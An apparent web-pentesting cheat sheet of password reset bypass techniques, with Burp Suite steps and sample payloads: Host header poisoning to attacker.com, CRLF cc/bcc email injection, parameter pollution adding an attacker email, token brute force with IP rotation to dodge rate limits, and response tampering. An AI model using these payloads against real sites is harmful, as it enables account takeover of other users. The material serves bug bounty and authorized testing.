Reset/Forgotten Password Bypass
The following techniques recompilation was taken from https://anugrahsr.github.io/posts/10-Password-reset-flaws/
The HTTP referer is an optional HTTP header field that identifies the address of the webpage which is linked to the resource being requested. The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed
Request password reset to your email address
Click on the password reset link
Dont change password
Click any 3rd party websites(eg: Facebook, twitter)
Intercept the request in burpsuite proxy
Check if the referer header is leaking password reset token.
It allows the person who has control of particular site to change the user’s password (CSRF attack), because this person knows reset password token of the user.
https://hackerone.com/reports/342693
https://hackerone.com/reports/272379
https://hackerone.com/reports/737042
https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a
https://medium.com/@shahjerry33/password-reset-token-leak-via-referrer-2e622500c2c1
If you find a host header attack and it’s out of scope, try to find the password reset button!
Intercept the password reset request in Burpsuite
Add following header or edit header in burpsuite(try one by one)
Host: attacker.com
Host: target.comX-Forwarded-Host: attacker.com
Host: target.comHost: attacker.com
Check if the link to change the password inside the email is pointing to attacker.com
Use $_SERVER['SERVER_NAME'] rather than $_SERVER['HTTP_HOST']
$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";
The victim will receive the malicious link in their email, and, when clicked, will leak the user’s password reset link / token to the attacker, leading to full account takeover.
https://hackerone.com/reports/226659
https://hackerone.com/reports/167631
https://www.acunetix.com/blog/articles/password-reset-poisoning/
https://pethuraj.com/blog/how-i-earned-800-for-host-header-injection-vulnerability/
https://medium.com/@swapmaurya20/password-reset-poisoning-leading-to-account-takeover-f178f5f1de87
Add attacker email as second parameter using &
POST /resetPassword[...]email=[email protected].com&email=[email protected].com
Add attacker email as second parameter using %20
POST /resetPassword[...]email=[email protected].com%20email=[email protected].com
Add attacker email as second parameter using |
POST /resetPassword[...]email=[email protected].com|email=[email protected].com
Add attacker email as second parameter using cc
POST /resetPassword[...]email="[email protected]%0a%0dcc:[email protected]"
Add attacker email as second parameter using bcc
POST /resetPassword[...]email="[email protected]%0a%0dbcc:[email protected]"
Add attacker email as second parameter using ,
POST /resetPassword[...]email="[email protected]",email="[email protected]"
Add attacker email as second parameter in json array
POST /resetPassword[...]{"email":["[email protected]","[email protected]"]}
https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
https://twitter.com/HusseiN98D/status/1254888748216655872
Attacker have to login with their account and Go to the Change password function
Start the Burp Suite and Intercept the request
After intercepting the request sent it to repeater and modify parameters Email and Password
POST /api/changepass[...]("form": {"email":"[email protected]","password":"12345678"})
https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240
Start the Burp Suite and Intercept the password reset request
Send to intruder
Use null payload
https://hackerone.com/reports/280534
https://hackerone.com/reports/794395
Figure out the pattern of password reset token
If it
Generated based Timestamp
Generated based on the UserID
Generated based on email of User
Generated based on Firstname and Lastname
Generated based on Date of Birth
Generated based on Cryptography
Use Burp Sequencer to find the randomness or predictability of tokens.
Look for Request and Response like these
HTTP/1.1 401 Unauthorized(“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)
Change Response
HTTP/1.1 200 OK(“message”:”success”,”statusCode:200,”errorDescription”:”Success”)
https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3
Check if the expired token can be reused
Try to bruteforce the reset token using Burpsuite
POST /resetPassword[...]email=[email protected].com&code=$BRUTE$
Use IP-Rotator on burpsuite to bypass IP based ratelimit.
https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
Try adding your password reset token with victim’s Account
POST /resetPassword[...]email=[email protected].com&code=$YOUR_TOKEN$
https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
